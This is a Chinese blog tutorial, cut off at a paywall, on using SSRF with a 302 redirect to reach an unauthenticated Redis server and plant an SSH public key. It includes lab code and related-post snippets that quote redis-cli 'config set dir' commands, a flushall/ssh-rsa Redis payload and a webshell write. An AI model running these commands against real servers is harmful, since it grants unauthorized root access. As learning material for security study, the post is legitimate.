SSRF 302跳转攻击redis写入ssh公钥实现远程登录

原创 已于 2024-08-24 23:05:13 修改 · 816 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#SSRF #redis

于 2024-08-24 23:04:39 首次发布

目录

SSRF漏洞

SSRF攻击Redis 

302跳转

漏洞复现:

index.html:

index.php:

攻击步骤:

1.生成ssh公钥数据:

2.用SSH公钥数据伪造Redis数据:

3.在自己的服务器上写302跳转:

4.最后尝试在.ssh目录下登录:

SSRF漏洞

        SSRF(Server Side Request Forgery,服务器端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞,因为求情是由服务器发出的,所以往往是利用SSRF漏洞攻击服务器所在网络内部系统。

SSRF攻击Redis 

         Redis是一个远程字典服务、Key-Value数据库,一般运行在内网中,使用者大多将其绑定在127.0.0.1:6379,而且Redis默认是无密码的。攻击者可以通过SSRF漏洞未授权访问内网Redis服务,可任意增、删、查、改其中的数据。因为Redis 一般是root启动的,所以可以利用且特殊身份和其导出功能(config set 可以设置保存路径,config set 可以设置保存文件名)向主机中写入shell脚本、比如写入Crontab、Webshell、SHH 公钥。

302跳转

        301、302都是http的状态码,都代表重定向,301是永久重定向,302是临时重定向,因为302是临时的,一般不会缓存数据,所以攻击者一般都会利用302重定向

        当浏览器收到的http状态码为302时,将自动从返回的http头中取出Location后的数据作为URL发出请求。但在web服务器中要让服务器自动跟随Location跳转,一般需要设置相关参数,比如php下需要设置如下:

curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);  # $ch 为curl 句柄   表示会跟随Location 跳转,这里时以递归的形式

漏洞复现:

index.html:
<!DOCTYPE html>
<head>
        <meta charset="utf-8">
</head>
<form action='index.php' method='get'>
        input url: <input type="text" name="url"><br>
        <input type="submit" value="提交">
</form>
index.php:
<?php
        function check_ip($url)         #对ip进行限制,现在内网ip
        {
                $match_res=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url);
                if(!$match_res)
                {
                        echo 'url fomat erro';
                        exit();
                }
                try
                {
                        $url_parse=parse_url($url);
                }
                catch(Exception $e)
                {
                        echo 'url fomat error';
                        exi
最低0.47元/天 解锁文章
ssrf结合redis写入公钥
m0_65540912的博客
07-05 1399
我这里用了Web-Redis-Lab漏洞环境来演示攻击机kali:192.168.168.128。
WAF,Yakit,SSH 小技巧
来日可期的博客
10-18 979
WAF,Yakit,SSH小技巧
Redis未授权访问以及getshell的几种方式
最新发布
you_possible的博客
09-21 1784
Redis数据库未授权访问以及getshell的几种方式。
【ctfhub】SSRF
qq_61109509的博客
02-20 1230
目录 SSRF 知识点:回环地址 内网访问 伪协议读取文件 数字IP Bypass DNS 重绑定 URL Bypass 302跳转 Bypass SSRF 在过滤了一堆中找ip本身 我们不能直接访问pc或moblie,必须通过server操作 直接改包很难,除非有说明是从本地来,否则严格的服务器不能通过改包实现 都是让服务器能够访问本地或者内网环境 知识点:回环地址 127.0.0.1 这是一个最常见的回环地址。 回环地址是什么呢? 回环地址并非只有一...
Xshell工具利用Redis 6379写入SSH公钥漏洞
maple_leaf
05-03 869
本文介绍了如何利用Xshell工具利用Redis 6379端口的漏洞,向目标主机注入SSH公钥
SSRF+Redis写入公钥
qq_43665434的博客
04-03 3650
野径云俱黑,江船火独明。 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库(未授权访问) window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis未授权访问写入公钥登录centos8 实验准备 思路: 先在自己的主机上生成公私钥对,利用redis的数据备份功能,将自己的公钥写入到目标服务器的/etc/authorized_keys中,然后使用ssh的私钥直接登录目标服务器。 条件: 1、redis服务使用root
SSRF 302跳转 gopher协议攻击redis写入ssh公钥实现远程无密登录(学习总结)
L2329794714的博客
11-20 3605
一、SSRF漏洞 SSRF(Server Side Request Forgery,服务器端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞,因为求情是由服务器发出的,所以往往是利用SSRF漏洞攻击服务器所在网络内部系统。 SSRF漏洞形成原因是服务器提供了从外部获取数据的功能,但没有对获取数据的目标地址、协议等进行过滤和限制,从而攻击者可以让服务器发起任意请求。 如下是一个简单的SSRF漏洞,对传入的url 没有做任何限制。即可通过向...
写入webshell和ssh公钥的具体步骤
09-04
如果是通过 SSRF 302 跳转攻击 redis 写入 ssh 公钥实现远程登录,可使用如下数据写入: ```plaintext *1\r $8\r flushall\r *3\r $3\r set\r $1\r 1\r $567\r ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCw4Mu9...
SSRF - ctfhub -2【FastCGI协议、Redis协议、URL Bypass、数字IP Bypass、302跳转 Bypass、DNS重绑定Bypass】
bin789456的博客
11-18 2512
FastCGI协议 知识参考:CTFhub官方链接 首先介绍一下原理(这里简单介绍,详情请看官方附件) 如果说HTTP来完成浏览器到中间件的请求,那么FastCGI就是从中间件到某语言后端进行交换的协议。 和浏览器请求包一样,也是由header、body组成。 还需要提到一个PHP-FPM,FastCGI进程管理器,即在php中(nginx等服务器中间件)FastCGI规则打包好后传递的终点,最后由FPM按照fastcgi的协议将TCP流解析成真正的数据。 比如打包好的数据长这样 { 'GATEWA
CTFHUB--SSRF(中)--FastCGI协议\Redis协议 以及gopherus工具攻击
qq_75120258的博客
03-29 2803
本来我们可以执行任意文件,但是在FPM某个版本之后,增加了security.limit_extensions选项,限定了只有某些后缀的文件允许被fpm执行,默认是.php,所以现在要使用这个漏洞,我们得先知道服务器上的一个php文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php。FastCGI是一个常驻型的CGI,它在服务器启动的时候先启动一个应用程序池,然后由这个应用程序池来管理和调度应用程序的执行。
redis未授权写入ssh公钥登录
m0_46576302的博客
09-09 5799
利用redis的备份功能,写入ssh公钥
利用网站拿到服务器登录权限,利用Redis写入SSH公钥获取服务器登陆权限
weixin_36156325的博客
08-02 2919
前置条件:1、操作机已安装redis客户端:redis-cli2、已使用ssh-keygen生成用于测试的ssh公钥|私钥(ssh-keygen -t rsa -C "test")操作步骤:1、将之前生成的公钥写入文件中cd~/.ssh/(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>hack.txt2、将hack.txt写入靶机Redi...
记一次学习过程(redis的编译安装,以及有关redis漏洞的学习,包括redis未授权写入ssh公钥redis写入木马、redis主从复制漏洞linux版)同时记录几个威胁分析平台
banliyaoguai的博客
08-03 1230
这个东西的流程是你发现了一个网站,然后你扫描对方端口,发现6379端口开着,而且通过一些其他漏洞可以登陆上redis后,你在redis中执行操作获取webshell权限。测试公私钥的时候不要在你的攻击机子和redis的服务器的机子上测试,或者你把测试完成的文件在服务器上删掉,删掉之前记得保存。这个是你冒充redis的主服务器,让redis从服务器下载木马(这里使用工具)这是你已经连接上了redis,你在redis中操作,在redis写入公钥。(下图是测试出现问题的情况,没出现问题的情况忘记截图了)
redisssh-keygen
weixin_34034261的博客
08-27 184
redis安装 在ubuntu上安装是非常方便的,两个命令就行了。 $sudo apt-get update $sudo apt-get install redis-server 复制代码 使用redis-cli命令出现redis 127.0.0.1:6379>,则安装成功了 根据Redisssh入侵入侵服务器。原理上并不复杂,只是利用的规则有点苛刻: redis要暴露在公网上 嗯ssh...
redis写shell与ssh免密码登陆
weixin_33971130的博客
03-13 421
redis-cli参数:-h:指定要连接的主机IP或域名-p:指定连接的端口-a:指定密码-r:执行指定的命令-n:数据库名-x:将最后一个参数输出为valueredis写shell-----端口6379redis-cli-h127.0.0.1configsetdirar/www/webroot/configsetdbfilenameredis.phpsetweb...
web中间件漏洞-Redis漏洞未授权访问漏洞-写webshell、写ssh公钥
Alsn86的博客
06-22 713
利用redis未授权访问、攻击机向服务器写入webshell从服务器查看写入的webshell菜刀连接。
redis 密钥登陆ssh
干铮的博客
01-31 1912
redis密钥登陆ssh 1.生成密钥 ssh-keygen -t rsa 2.防止乱码导入到key文件中 (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt cat key.txt | redis-cli -h 192.168.3.26 --pass 123456 -x set xxx --pass是登录密码 无密码可不填 redis-cli -h 192.168.3.26 config set dir /ro
SSRFRedis中反弹shell
weixin_34126215的博客
05-27 1096
搭个环境怪不容易的,求大佬们放过。。。 参考文献:https://joychou.org/web/phpssrf.htmlhttps://www.anquanke.com/post/id/146417 SSRF概念 SSRF(Server-Side Request Forgery),服务端请求伪造,利用漏...
Redis未授权访问配合SSH key的综合利用
hyy615545936的博客
09-11 1758
【实验原理】 利用 Redis 自身的提供的config命令,可以进行写文件操作,恶意访问者可以成功将自己的公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以直接使用对应的私钥登录目标服务器。 步骤一:在本地生产公私钥文件 linux系统行使用命令ssh-keygen -t rsa生成本地公钥和私钥文件,输入密码口令;如下其显示成功生成公...
以下哪些方式可以结合或利用redis服务进行攻击? 在redis写入ssh公钥,获取操作系统权限 在crontab里写入定时任务,反弹shell 组合SSRF漏洞攻击redis服务 redis主从复制RCE
06-09
1. 在 Redis写入 SSH 公钥,获取操作系统权限:攻击者可以通过 Redis 服务将 SSH 公钥写入目标服务器中,然后利用该公钥获取操作系统权限。 2. 在 crontab 里写入定时任务,反弹 Shell:攻击者可以通过 Redis ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值